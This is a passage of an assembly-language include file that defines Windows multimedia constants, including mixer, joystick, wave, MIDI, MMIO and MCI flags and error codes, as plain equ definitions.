MIXER_OBJECTF_HWAVEOUT equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_WAVEOUT
MIXER_OBJECTF_WAVEIN equ 20000000h
MIXER_OBJECTF_HWAVEIN equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_WAVEIN
MIXER_OBJECTF_MIDIOUT equ 30000000h
MIXER_OBJECTF_HMIDIOUT equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_MIDIOUT
MIXER_OBJECTF_MIDIIN equ 40000000h
MIXER_OBJECTF_HMIDIIN equ MIXER_OBJECTF_HANDLE|MIXER_OBJECTF_MIDIIN
MIXER_OBJECTF_AUX equ 50000000h
MIXERLINE_LINEF_ACTIVE equ 1h
MIXERLINE_LINEF_DISCONNECTED equ 8000h
MIXERLINE_LINEF_SOURCE equ 80000000h
MIXERLINE_COMPONENTTYPE_DST_FIRST equ 0h
MIXERLINE_COMPONENTTYPE_DST_UNDEFINED equ MIXERLINE_COMPONENTTYPE_DST_FIRST+0
MIXERLINE_COMPONENTTYPE_DST_DIGITAL equ MIXERLINE_COMPONENTTYPE_DST_FIRST+1
MIXERLINE_COMPONENTTYPE_DST_LINE equ MIXERLINE_COMPONENTTYPE_DST_FIRST+2
MIXERLINE_COMPONENTTYPE_DST_MONITOR equ MIXERLINE_COMPONENTTYPE_DST_FIRST+3
MIXERLINE_COMPONENTTYPE_DST_SPEAKERS equ MIXERLINE_COMPONENTTYPE_DST_FIRST+4
MIXERLINE_COMPONENTTYPE_DST_HEADPHONES equ MIXERLINE_COMPONENTTYPE_DST_FIRST+5
MIXERLINE_COMPONENTTYPE_DST_TELEPHONE equ MIXERLINE_COMPONENTTYPE_DST_FIRST+6
MIXERLINE_COMPONENTTYPE_DST_WAVEIN equ MIXERLINE_COMPONENTTYPE_DST_FIRST+7
MIXERLINE_COMPONENTTYPE_DST_VOICEIN equ MIXERLINE_COMPONENTTYPE_DST_FIRST+8
MIXERLINE_COMPONENTTYPE_DST_LAST equ MIXERLINE_COMPONENTTYPE_DST_FIRST+8
MIXERLINE_COMPONENTTYPE_SRC_FIRST equ 1000h
MIXERLINE_COMPONENTTYPE_SRC_UNDEFINED equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+0
MIXERLINE_COMPONENTTYPE_SRC_DIGITAL equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+1
MIXERLINE_COMPONENTTYPE_SRC_LINE equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+2
MIXERLINE_COMPONENTTYPE_SRC_MICROPHONE equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+3
MIXERLINE_COMPONENTTYPE_SRC_SYNTHESIZER equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+4
MIXERLINE_COMPONENTTYPE_SRC_COMPACTDISC equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+5
MIXERLINE_COMPONENTTYPE_SRC_TELEPHONE equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+6
MIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+7
MIXERLINE_COMPONENTTYPE_SRC_WAVEOUT equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+8
MIXERLINE_COMPONENTTYPE_SRC_AUXILIARY equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+9
MIXERLINE_COMPONENTTYPE_SRC_ANALOG equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+10
MIXERLINE_COMPONENTTYPE_SRC_LAST equ MIXERLINE_COMPONENTTYPE_SRC_FIRST+10
MIXERLINE_TARGETTYPE_UNDEFINED equ 0
MIXERLINE_TARGETTYPE_WAVEOUT equ 1
MIXERLINE_TARGETTYPE_WAVEIN equ 2
MIXERLINE_TARGETTYPE_MIDIOUT equ 3
MIXERLINE_TARGETTYPE_MIDIIN equ 4
MIXERLINE_TARGETTYPE_AUX equ 5
MIXER_GETLINEINFOF_DESTINATION equ 0h
MIXER_GETLINEINFOF_SOURCE equ 1h
MIXER_GETLINEINFOF_LINEID equ 2h
MIXER_GETLINEINFOF_COMPONENTTYPE equ 3h
MIXER_GETLINEINFOF_TARGETTYPE equ 4h
MIXER_GETLINEINFOF_QUERYMASK equ 0Fh
MIXERCONTROL_CONTROLF_UNIFORM equ 1h
MIXERCONTROL_CONTROLF_MULTIPLE equ 2h
MIXERCONTROL_CONTROLF_DISABLED equ 80000000h
MIXERCONTROL_CT_CLASS_MASK equ 0F0000000h
MIXERCONTROL_CT_CLASS_CUSTOM equ 0h
MIXERCONTROL_CT_CLASS_METER equ 10000000h
MIXERCONTROL_CT_CLASS_SWITCH equ 20000000h
MIXERCONTROL_CT_CLASS_NUMBER equ 30000000h
MIXERCONTROL_CT_CLASS_SLIDER equ 40000000h
MIXERCONTROL_CT_CLASS_FADER equ 50000000h
MIXERCONTROL_CT_CLASS_TIME equ 60000000h
MIXERCONTROL_CT_CLASS_LIST equ 70000000h
MIXERCONTROL_CT_SUBCLASS_MASK equ 0F000000h
MIXERCONTROL_CT_SC_SWITCH_BOOLEAN equ 0h
MIXERCONTROL_CT_SC_SWITCH_BUTTON equ 1000000h
MIXERCONTROL_CT_SC_METER_POLLED equ 0h
MIXERCONTROL_CT_SC_TIME_MICROSECS equ 0h
MIXERCONTROL_CT_SC_TIME_MILLISECS equ 1000000h
MIXERCONTROL_CT_SC_LIST_SINGLE equ 0h
MIXERCONTROL_CT_SC_LIST_MULTIPLE equ 1000000h
MIXERCONTROL_CT_UNITS_MASK equ 0FF0000h
MIXERCONTROL_CT_UNITS_CUSTOM equ 0h
MIXERCONTROL_CT_UNITS_BOOLEAN equ 10000h
MIXERCONTROL_CT_UNITS_SIGNED equ 20000h
MIXERCONTROL_CT_UNITS_UNSIGNED equ 30000h
MIXERCONTROL_CT_UNITS_DECIBELS equ 40000h
MIXERCONTROL_CT_UNITS_PERCENT equ 50000h
MIXERCONTROL_CONTROLTYPE_CUSTOM equ MIXERCONTROL_CT_CLASS_CUSTOM|MIXERCONTROL_CT_UNITS_CUSTOM
MIXERCONTROL_CONTROLTYPE_BOOLEANMETER equ MIXERCONTROL_CT_CLASS_METER|
MIXERCONTROL_CT_SC_METER_POLLED|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_SIGNEDMETER equ MIXERCONTROL_CT_CLASS_METER|
MIXERCONTROL_CT_SC_METER_POLLED|MIXERCONTROL_CT_UNITS_SIGNED
MIXERCONTROL_CONTROLTYPE_PEAKMETER equ MIXERCONTROL_CONTROLTYPE_SIGNEDMETER+1
MIXERCONTROL_CONTROLTYPE_UNSIGNEDMETER equ MIXERCONTROL_CT_CLASS_METER|
MIXERCONTROL_CT_SC_METER_POLLED|MIXERCONTROL_CT_UNITS_UNSIGNED
MIXERCONTROL_CONTROLTYPE_BOOLEAN equ MIXERCONTROL_CT_CLASS_SWITCH|
MIXERCONTROL_CT_SC_SWITCH_BOOLEAN|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_ONOFF equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+1
MIXERCONTROL_CONTROLTYPE_MUTE equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+2
MIXERCONTROL_CONTROLTYPE_MONO equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+3
MIXERCONTROL_CONTROLTYPE_LOUDNESS equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+4
MIXERCONTROL_CONTROLTYPE_STEREOENH equ MIXERCONTROL_CONTROLTYPE_BOOLEAN+5
MIXERCONTROL_CONTROLTYPE_BUTTON equ MIXERCONTROL_CT_CLASS_SWITCH|
MIXERCONTROL_CT_SC_SWITCH_BUTTON|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_DECIBELS equ MIXERCONTROL_CT_CLASS_NUMBER|
MIXERCONTROL_CT_UNITS_DECIBELS
MIXERCONTROL_CONTROLTYPE_SIGNED equ MIXERCONTROL_CT_CLASS_NUMBER|MIXERCONTROL_CT_UNITS_SIGNED
MIXERCONTROL_CONTROLTYPE_UNSIGNED equ MIXERCONTROL_CT_CLASS_NUMBER|
MIXERCONTROL_CT_UNITS_UNSIGNED
MIXERCONTROL_CONTROLTYPE_PERCENT equ MIXERCONTROL_CT_CLASS_NUMBER|
MIXERCONTROL_CT_UNITS_PERCENT
MIXERCONTROL_CONTROLTYPE_SLIDER equ MIXERCONTROL_CT_CLASS_SLIDER|MIXERCONTROL_CT_UNITS_SIGNED
MIXERCONTROL_CONTROLTYPE_PAN equ MIXERCONTROL_CONTROLTYPE_SLIDER+1
MIXERCONTROL_CONTROLTYPE_QSOUNDPAN equ MIXERCONTROL_CONTROLTYPE_SLIDER+2
MIXERCONTROL_CONTROLTYPE_FADER equ MIXERCONTROL_CT_CLASS_FADER|MIXERCONTROL_CT_UNITS_UNSIGNED
MIXERCONTROL_CONTROLTYPE_VOLUME equ MIXERCONTROL_CONTROLTYPE_FADER+1
MIXERCONTROL_CONTROLTYPE_BASS equ MIXERCONTROL_CONTROLTYPE_FADER+2
MIXERCONTROL_CONTROLTYPE_TREBLE equ MIXERCONTROL_CONTROLTYPE_FADER+3
MIXERCONTROL_CONTROLTYPE_EQUALIZER equ MIXERCONTROL_CONTROLTYPE_FADER+4
MIXERCONTROL_CONTROLTYPE_SINGLESELECT equ MIXERCONTROL_CT_CLASS_LIST|
MIXERCONTROL_CT_SC_LIST_SINGLE|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_MUX equ MIXERCONTROL_CONTROLTYPE_SINGLESELECT+1
MIXERCONTROL_CONTROLTYPE_MULTIPLESELECT equ MIXERCONTROL_CT_CLASS_LIST|
MIXERCONTROL_CT_SC_LIST_MULTIPLE|MIXERCONTROL_CT_UNITS_BOOLEAN
MIXERCONTROL_CONTROLTYPE_MIXER equ MIXERCONTROL_CONTROLTYPE_MULTIPLESELECT+1
MIXERCONTROL_CONTROLTYPE_MICROTIME equ MIXERCONTROL_CT_CLASS_TIME|
MIXERCONTROL_CT_SC_TIME_MICROSECS|MIXERCONTROL_CT_UNITS_UNSIGNED
MIXERCONTROL_CONTROLTYPE_MILLITIME equ MIXERCONTROL_CT_CLASS_TIME|
MIXERCONTROL_CT_SC_TIME_MILLISECS|MIXERCONTROL_CT_UNITS_UNSIGNED
MIXER_GETLINECONTROLSF_ALL equ 0h
MIXER_GETLINECONTROLSF_ONEBYID equ 1h
MIXER_GETLINECONTROLSF_ONEBYTYPE equ 2h
MIXER_GETLINECONTROLSF_QUERYMASK equ 0Fh
MIXER_GETCONTROLDETAILSF_VALUE equ 0h
MIXER_GETCONTROLDETAILSF_LISTTEXT equ 1h
MIXER_GETCONTROLDETAILSF_QUERYMASK equ 0Fh
MIXER_SETCONTROLDETAILSF_VALUE equ 0h
MIXER_SETCONTROLDETAILSF_CUSTOM equ 1h
MIXER_SETCONTROLDETAILSF_QUERYMASK equ 0Fh
JOY_BUTTON5 equ 10h
JOY_BUTTON6 equ 20h
JOY_BUTTON7 equ 40h
JOY_BUTTON8 equ 80h
JOY_BUTTON9 equ 100h
JOY_BUTTON10 equ 200h
JOY_BUTTON11 equ 400h
JOY_BUTTON12 equ 800h
JOY_BUTTON13 equ 1000h
JOY_BUTTON14 equ 2000h
JOY_BUTTON15 equ 4000h
JOY_BUTTON16 equ 8000h
JOY_BUTTON17 equ 10000h
JOY_BUTTON18 equ 20000h
JOY_BUTTON19 equ 40000h
JOY_BUTTON20 equ 80000h
JOY_BUTTON21 equ 100000h
JOY_BUTTON22 equ 200000h
JOY_BUTTON23 equ 400000h
JOY_BUTTON24 equ 800000h
JOY_BUTTON25 equ 1000000h
JOY_BUTTON26 equ 2000000h
JOY_BUTTON27 equ 4000000h
JOY_BUTTON28 equ 8000000h
JOY_BUTTON29 equ 10000000h
JOY_BUTTON30 equ 20000000h
JOY_BUTTON31 equ 40000000h
JOY_BUTTON32 equ 80000000h
JOY_POVCENTERED equ -1
JOY_POVFORWARD equ 0
JOY_POVRIGHT equ 9000
JOY_POVBACKWARD equ 18000
JOY_POVLEFT equ 27000
JOY_RETURNX equ 1h
JOY_RETURNY equ 2h
JOY_RETURNZ equ 4h
JOY_RETURNR equ 8h
JOY_RETURNU equ 10h
JOY_RETURNV equ 20h
JOY_RETURNPOV equ 40h
JOY_RETURNBUTTONS equ 80h
JOY_RETURNRAWDATA equ 100h
JOY_RETURNPOVCTS equ 200h
JOY_RETURNCENTERED equ 400h
JOY_USEDEADZONE equ 800h
JOY_RETURNALL equ JOY_RETURNX|JOY_RETURNY|JOY_RETURNZ|JOY_RETURNR|JOY_RETURNU|JOY_RETURNV|
JOY_RETURNPOV|JOY_RETURNBUTTONS
JOY_CAL_READALWAYS equ 10000h
JOY_CAL_READXYONLY equ 20000h
JOY_CAL_READ3 equ 40000h
JOY_CAL_READ4 equ 80000h
JOY_CAL_READXONLY equ 100000h
JOY_CAL_READYONLY equ 200000h
JOY_CAL_READ5 equ 400000h
JOY_CAL_READ6 equ 800000h
JOY_CAL_READZONLY equ 1000000h
JOY_CAL_READRONLY equ 2000000h
JOY_CAL_READUONLY equ 4000000h
JOY_CAL_READVONLY equ 8000000h
WAVE_FORMAT_QUERY equ 1h
SND_PURGE equ 40h
SND_APPLICATION equ 80h
WAVE_MAPPED equ 4h
WAVE_FORMAT_DIRECT equ 8h
WAVE_FORMAT_DIRECT_QUERY equ WAVE_FORMAT_QUERY|WAVE_FORMAT_DIRECT
MIM_MOREDATA equ MM_MIM_MOREDATA
MOM_POSITIONCB equ MM_MOM_POSITIONCB
MIDI_IO_STATUS equ 20h
DRV_LOAD equ 1h
DRV_ENABLE equ 2h
DRV_OPEN equ 3h
DRV_CLOSE equ 4h
DRV_DISABLE equ 5h
DRV_FREE equ 6h
DRV_CONFIGURE equ 7h
DRV_QUERYCONFIGURE equ 8h
DRV_INSTALL equ 9h
DRV_REMOVE equ 0Ah
DRV_EXITSESSION equ 0Bh
DRV_POWER equ 0Fh
DRV_RESERVED equ 800h
DRV_USER equ 4000h
DRVCNF_CANCEL equ 0h
DRVCNF_OK equ 1h
DRVCNF_RESTART equ 2h
DRV_CANCEL equ DRVCNF_CANCEL
DRV_OK equ DRVCNF_OK
DRV_RESTART equ DRVCNF_RESTART
DRV_MCI_FIRST equ DRV_RESERVED
DRV_MCI_LAST equ DRV_RESERVED+0FFFh
CALLBACK_TYPEMASK equ 70000h
CALLBACK_NULL equ 0h
CALLBACK_WINDOW equ 10000h
CALLBACK_TASK equ 20000h
CALLBACK_FUNCTION equ 30000h
MM_MICROSOFT equ 1
MM_MIDI_MAPPER equ 1
MM_WAVE_MAPPER equ 2
MM_SNDBLST_MIDIOUT equ 3
MM_SNDBLST_MIDIIN equ 4
MM_SNDBLST_SYNTH equ 5
MM_SNDBLST_WAVEOUT equ 6
MM_SNDBLST_WAVEIN equ 7
MM_ADLIB equ 9
MM_MPU401_MIDIOUT equ 10
MM_MPU401_MIDIIN equ 11
MM_PC_JOYSTICK equ 12
SND_SYNC equ 0h
SND_ASYNC equ 1h
SND_NODEFAULT equ 2h
SND_MEMORY equ 4h
SND_ALIAS equ 10000h
SND_FILENAME equ 20000h
SND_RESOURCE equ 40004h
SND_ALIAS_ID equ 110000h
SND_ALIAS_START equ 0
SND_LOOP equ 8h
SND_NOSTOP equ 10h
SND_VALID equ 1Fh
SND_NOWAIT equ 2000h
SND_VALIDFLAGS equ 17201Fh
SND_RESERVED equ 0FF000000h
SND_TYPE_MASK equ 170007h
WAVERR_BADFORMAT equ WAVERR_BASE+0
WAVERR_STILLPLAYING equ WAVERR_BASE+1
WAVERR_UNPREPARED equ WAVERR_BASE+2
WAVERR_SYNC equ WAVERR_BASE+3
WAVERR_LASTERROR equ WAVERR_BASE+3
WOM_OPEN equ MM_WOM_OPEN
WOM_CLOSE equ MM_WOM_CLOSE
WOM_DONE equ MM_WOM_DONE
WIM_OPEN equ MM_WIM_OPEN
WIM_CLOSE equ MM_WIM_CLOSE
WIM_DATA equ MM_WIM_DATA
WAVE_MAPPER equ -1
WAVE_ALLOWSYNC equ 2h
WAVE_VALID equ 3h
WHDR_DONE equ 1h
WHDR_PREPARED equ 2h
WHDR_BEGINLOOP equ 4h
WHDR_ENDLOOP equ 8h
WHDR_INQUEUE equ 10h
WHDR_VALID equ 1Fh
WAVECAPS_PITCH equ 1h
WAVECAPS_PLAYBACKRATE equ 2h
WAVECAPS_VOLUME equ 4h
WAVECAPS_LRVOLUME equ 8h
WAVECAPS_SYNC equ 10h
WAVE_INVALIDFORMAT equ 0h
WAVE_FORMAT_1M08 equ 1h
WAVE_FORMAT_1S08 equ 2h
WAVE_FORMAT_1M16 equ 4h
WAVE_FORMAT_1S16 equ 8h
WAVE_FORMAT_2M08 equ 10h
WAVE_FORMAT_2S08 equ 20h
WAVE_FORMAT_2M16 equ 40h
WAVE_FORMAT_2S16 equ 80h
WAVE_FORMAT_4M08 equ 100h
WAVE_FORMAT_4S08 equ 200h
WAVE_FORMAT_4M16 equ 400h
WAVE_FORMAT_4S16 equ 800h
WAVE_FORMAT_PCM equ 1
MIDIERR_UNPREPARED equ MIDIERR_BASE+0
MIDIERR_STILLPLAYING equ MIDIERR_BASE+1
MIDIERR_NOMAP equ MIDIERR_BASE+2
MIDIERR_NOTREADY equ MIDIERR_BASE+3
MIDIERR_NODEVICE equ MIDIERR_BASE+4
MIDIERR_INVALIDSETUP equ MIDIERR_BASE+5
MIDIERR_LASTERROR equ MIDIERR_BASE+5
MIM_OPEN equ MM_MIM_OPEN
MIM_CLOSE equ MM_MIM_CLOSE
MIM_DATA equ MM_MIM_DATA
MIM_LONGDATA equ MM_MIM_LONGDATA
MIM_ERROR equ MM_MIM_ERROR
MIM_LONGERROR equ MM_MIM_LONGERROR
MOM_OPEN equ MM_MOM_OPEN
MOM_CLOSE equ MM_MOM_CLOSE
MOM_DONE equ MM_MOM_DONE
MIDIMAPPER equ -1
MIDI_MAPPER equ -1
MIDI_CACHE_ALL equ 1
MIDI_CACHE_BESTFIT equ 2
MIDI_CACHE_QUERY equ 3
MIDI_UNCACHE equ 4
MIDI_CACHE_VALID equ MIDI_CACHE_ALL|MIDI_CACHE_BESTFIT|MIDI_CACHE_QUERY|MIDI_UNCACHE
MOD_MIDIPORT equ 1
MOD_SYNTH equ 2
MOD_SQSYNTH equ 3
MOD_FMSYNTH equ 4
MOD_MAPPER equ 5
MIDICAPS_VOLUME equ 1h
MIDICAPS_LRVOLUME equ 2h
MIDICAPS_CACHE equ 4h
MHDR_DONE equ 1h
MHDR_PREPARED equ 2h
MHDR_INQUEUE equ 4h
MHDR_VALID equ 7h
AUX_MAPPER equ -1
AUXCAPS_CDAUDIO equ 1
AUXCAPS_AUXIN equ 2
AUXCAPS_VOLUME equ 1h
AUXCAPS_LRVOLUME equ 2h
TIMERR_NOERROR equ 0
TIMERR_NOCANDO equ TIMERR_BASE+1
TIMERR_STRUCT equ TIMERR_BASE+33
TIME_ONESHOT equ 0
TIME_PERIODIC equ 1
JOYERR_NOERROR equ 0
JOYERR_PARMS equ JOYERR_BASE+5
JOYERR_NOCANDO equ JOYERR_BASE+6
JOYERR_UNPLUGGED equ JOYERR_BASE+7
JOY_BUTTON1 equ 1h
JOY_BUTTON2 equ 2h
JOY_BUTTON3 equ 4h
JOY_BUTTON4 equ 8h
JOY_BUTTON1CHG equ 100h
JOY_BUTTON2CHG equ 200h
JOY_BUTTON3CHG equ 400h
JOY_BUTTON4CHG equ 800h
JOYSTICKID1 equ 0
JOYSTICKID2 equ 1
MMIOERR_BASE equ 256
MMIOERR_FILENOTFOUND equ MMIOERR_BASE+1
MMIOERR_OUTOFMEMORY equ MMIOERR_BASE+2
MMIOERR_CANNOTOPEN equ MMIOERR_BASE+3
MMIOERR_CANNOTCLOSE equ MMIOERR_BASE+4
MMIOERR_CANNOTREAD equ MMIOERR_BASE+5
MMIOERR_CANNOTWRITE equ MMIOERR_BASE+6
MMIOERR_CANNOTSEEK equ MMIOERR_BASE+7
MMIOERR_CANNOTEXPAND equ MMIOERR_BASE+8
MMIOERR_CHUNKNOTFOUND equ MMIOERR_BASE+9
MMIOERR_UNBUFFERED equ MMIOERR_BASE+10
MMIO_RWMODE equ 3h
MMIO_SHAREMODE equ 70h
MMIO_CREATE equ 1000h
MMIO_PARSE equ 100h
MMIO_DELETE equ 200h
MMIO_EXIST equ 4000h
MMIO_ALLOCBUF equ 10000h
MMIO_GETTEMP equ 20000h
MMIO_DIRTY equ 10000000h
MMIO_OPEN_VALID equ 3FFFFh
MMIO_READ equ 0h
MMIO_WRITE equ 1h
MMIO_READWRITE equ 2h
MMIO_COMPAT equ 0h
MMIO_EXCLUSIVE equ 10h
MMIO_DENYWRITE equ 20h
MMIO_DENYREAD equ 30h
MMIO_DENYNONE equ 40h
MMIO_FHOPEN equ 10h
MMIO_EMPTYBUF equ 10h
MMIO_TOUPPER equ 10h
MMIO_INSTALLPROC equ 10000h
MMIO_PUBLICPROC equ 10000000h
MMIO_UNICODEPROC equ 1000000h
MMIO_REMOVEPROC equ 20000h
MMIO_FINDPROC equ 40000h
MMIO_FINDCHUNK equ 10h
MMIO_FINDRIFF equ 20h
MMIO_FINDLIST equ 40h
MMIO_CREATERIFF equ 20h
MMIO_CREATELIST equ 40h
MMIO_VALIDPROC equ 11070000h
MMIOM_READ equ MMIO_READ
MMIOM_WRITE equ MMIO_WRITE
MMIOM_SEEK equ 2
MMIOM_OPEN equ 3
MMIOM_CLOSE equ 4
MMIOM_WRITEFLUSH equ 5
MMIOM_RENAME equ 6
MMIOM_USER equ 8000h
SEEK_SET equ 0
SEEK_CUR equ 1
SEEK_END equ 2
MMIO_DEFAULTBUFFER equ 8192
MCIERR_INVALID_DEVICE_ID equ MCIERR_BASE+1
MCIERR_UNRECOGNIZED_KEYWORD equ MCIERR_BASE+3
MCIERR_UNRECOGNIZED_COMMAND equ MCIERR_BASE+5
MCIERR_HARDWARE equ MCIERR_BASE+6
MCIERR_INVALID_DEVICE_NAME equ MCIERR_BASE+7
MCIERR_OUT_OF_MEMORY equ MCIERR_BASE+8
MCIERR_DEVICE_OPEN equ MCIERR_BASE+9
MCIERR_CANNOT_LOAD_DRIVER equ MCIERR_BASE+10
MCIERR_MISSING_COMMAND_STRING equ MCIERR_BASE+11
MCIERR_PARAM_OVERFLOW equ MCIERR_BASE+12
MCIERR_MISSING_STRING_ARGUMENT equ MCIERR_BASE+13
MCIERR_BAD_INTEGER equ MCIERR_BASE+14
MCIERR_PARSER_INTERNAL equ MCIERR_BASE+15
MCIERR_DRIVER_INTERNAL equ MCIERR_BASE+16
MCIERR_MISSING_PARAMETER equ MCIERR_BASE+17
MCIERR_UNSUPPORTED_FUNCTION equ MCIERR_BASE+18
MCIERR_FILE_NOT_FOUND equ MCIERR_BASE+19
MCIERR_DEVICE_NOT_READY equ MCIERR_BASE+20
MCIERR_INTERNAL equ MCIERR_BASE+21
MCIERR_DRIVER equ MCIERR_BASE+22
MCIERR_CANNOT_USE_ALL equ MCIERR_BASE+23
MCIERR_MULTIPLE equ MCIERR_BASE+24
MCIERR_EXTENSION_NOT_FOUND equ MCIERR_BASE+25
MCIERR_OUTOFRANGE equ MCIERR_BASE+26
MCIERR_FLAGS_NOT_COMPATIBLE equ MCIERR_BASE+28
MCIERR_FILE_NOT_SAVED equ MCIERR_BASE+30
MCIERR_DEVICE_TYPE_REQUIRED equ MCIERR_BASE+31
MCIERR_DEVICE_LOCKED equ MCIERR_BASE+32
MCIERR_DUPLICATE_ALIAS equ MCIERR_BASE+33
MCIERR_BAD_CONSTANT equ MCIERR_BASE+34
MCIERR_MUST_USE_SHAREABLE equ MCIERR_BASE+35
MCIERR_MISSING_DEVICE_NAME equ MCIERR_BASE+36
MCIERR_BAD_TIME_FORMAT equ MCIERR_BASE+37
MCIERR_NO_CLOSING_QUOTE equ MCIERR_BASE+38
MCIERR_DUPLICATE_FLAGS equ MCIERR_BASE+39
MCIERR_INVALID_FILE equ MCIERR_BASE+40
MCIERR_NULL_PARAMETER_BLOCK equ MCIERR_BASE+41
MCIERR_UNNAMED_RESOURCE equ MCIERR_BASE+42
MCIERR_NEW_REQUIRES_ALIAS equ MCIERR_BASE+43
MCIERR_NOTIFY_ON_AUTO_OPEN equ MCIERR_BASE+44
MCIERR_NO_ELEMENT_ALLOWED equ MCIERR_BASE+45
MCIERR_NONAPPLICABLE_FUNCTION equ MCIERR_BASE+46
MCIERR_ILLEGAL_FOR_AUTO_OPEN equ MCIERR_BASE+47
MCIERR_FILENAME_REQUIRED equ MCIERR_BASE+48
MCIERR_EXTRA_CHARACTERS equ MCIERR_BASE+49
MCIERR_DEVICE_NOT_INSTALLED equ MCIERR_BASE+50
MCIERR_GET_CD equ MCIERR_BASE+51
MCIERR_SET_CD equ MCIERR_BASE+52
MCIERR_SET_DRIVE equ MCIERR_BASE+53
MCIERR_DEVICE_LENGTH equ MCIERR_BASE+54
MCIERR_DEVICE_ORD_LENGTH equ MCIERR_BASE+55
MCIERR_NO_INTEGER equ MCIERR_BASE+56
MCIERR_WAVE_OUTPUTSINUSE equ MCIERR_BASE+64
MCIERR_WAVE_SETOUTPUTINUSE equ MCIERR_BASE+65
MCIERR_WAVE_INPUTSINUSE equ MCIERR_BASE+66
MCIERR_WAVE_SETINPUTINUSE equ MCIERR_BASE+67
MCIERR_WAVE_OUTPUTUNSPECIFIED equ MCIERR_BASE+68
MCIERR_WAVE_INPUTUNSPECIFIED equ MCIERR_BASE+69
MCIERR_WAVE_OUTPUTSUNSUITABLE equ MCIERR_BASE+70
MCIERR_WAVE_SETOUTPUTUNSUITABLE equ MCIERR_BASE+71
MCIERR_WAVE_INPUTSUNSUITABLE equ MCIERR_BASE+72
MCIERR_WAVE_SETINPUTUNSUITABLE equ MCIERR_BASE+73
MCIERR_SEQ_DIV_INCOMPATIBLE equ MCIERR_BASE+80
MCIERR_SEQ_PORT_INUSE equ MCIERR_BASE+81
MCIERR_SEQ_PORT_NONEXISTENT equ MCIERR_BASE+82
MCIERR_SEQ_PORT_MAPNODEVICE equ MCIERR_BASE+83
MCIERR_SEQ_PORT_MISCERROR equ MCIERR_BASE+84
MCIERR_SEQ_TIMER equ MCIERR_BASE+85
MCIERR_SEQ_PORTUNSPECIFIED equ MCIERR_BASE+86
MCIERR_SEQ_NOMIDIPRESENT equ MCIERR_BASE+87
MCIERR_NO_WINDOW equ MCIERR_BASE+90
MCIERR_CREATEWINDOW equ MCIERR_BASE+91
MCIERR_FILE_READ equ MCIERR_BASE+92
MCIERR_FILE_WRITE equ MCIERR_BASE+93
MCIERR_CUSTOM_DRIVER_BASE equ MCIERR_BASE+256
MCI_FIRST equ 800h
MCI_OPEN equ 803h
MCI_CLOSE equ 804h
MCI_ESCAPE equ 805h
MCI_PLAY equ 806h
MCI_SEEK equ 807h
MCI_STOP equ 808h
MCI_PAUSE equ 809h
MCI_INFO equ 80Ah
MCI_GETDEVCAPS equ 80Bh
MCI_SPIN equ 80Ch
MCI_SET equ 80Dh
MCI_STEP equ 80Eh
MCI_RECORD equ 80Fh
MCI_SYSINFO equ 810h
MCI_BREAK equ 811h
MCI_SOUND equ 812h
MCI_SAVE equ 813h
MCI_STATUS equ 814h
MCI_CUE equ 830h
MCI_REALIZE equ 840h
MCI_WINDOW equ 841h
MCI_PUT equ 842h
MCI_WHERE equ 843h
MCI_FREEZE equ 844h
MCI_UNFREEZE equ 845h
MCI_LOAD equ 850h
MCI_CUT equ 851h
MCI_COPY equ 852h
MCI_PASTE equ 853h
MCI_UPDATE equ 854h
MCI_RESUME equ 855h
MCI_DELETE equ 856h
MCI_LAST equ 0FFFh
MCI_USER_MESSAGES equ 400h+MCI_FIRST
MCI_ALL_DEVICE_ID equ -1
MCI_DEVTYPE_VCR equ 513
MCI_DEVTYPE_VIDEODISC equ 514
MCI_DEVTYPE_OVERLAY equ 515
MCI_DEVTYPE_CD_AUDIO equ 516
MCI_DEVTYPE_DAT equ 517
MCI_DEVTYPE_SCANNER equ 518
MCI_DEVTYPE_ANIMATION equ 519
MCI_DEVTYPE_DIGITAL_VIDEO equ 520
MCI_DEVTYPE_OTHER equ 521
MCI_DEVTYPE_WAVEFORM_AUDIO equ 522
MCI_DEVTYPE_SEQUENCER equ 523
MCI_DEVTYPE_FIRST equ MCI_DEVTYPE_VCR
MCI_DEVTYPE_LAST equ MCI_DEVTYPE_SEQUENCER
MCI_DEVTYPE_FIRST_USER equ 1000h
MCI_MODE_NOT_READY equ MCI_STRING_OFFSET+12
MCI_MODE_STOP equ MCI_STRING_OFFSET+13
MCI_MODE_PLAY equ MCI_STRING_OFFSET+14
MCI_MODE_RECORD equ MCI_STRING_OFFSET+15
MCI_MODE_SEEK equ MCI_STRING_OFFSET+16
MCI_MODE_PAUSE equ MCI_STRING_OFFSET+17
MCI_MODE_OPEN equ MCI_STRING_OFFSET+18
MCI_FORMAT_MILLISECONDS equ 0
MCI_FORMAT_HMS equ 1
MCI_FORMAT_MSF equ 2
MCI_FORMAT_FRAMES equ 3
MCI_FORMAT_SMPTE_24 equ 4
MCI_FORMAT_SMPTE_25 equ 5
MCI_FORMAT_SMPTE_30 equ 6
MCI_FORMAT_SMPTE_30DROP equ 7
MCI_FORMAT_BYTES equ 8
MCI_FORMAT_SAMPLES equ 9
MCI_FORMAT_TMSF equ 10
MCI_NOTIFY_SUCCESSFUL equ 1h
MCI_NOTIFY_SUPERSEDED equ 2h
MCI_NOTIFY_ABORTED equ 4h
MCI_NOTIFY_FAILURE equ 8h
MCI_NOTIFY equ 1h
MCI_WAIT equ 2h
MCI_FROM equ 4h
MCI_TO equ 8h
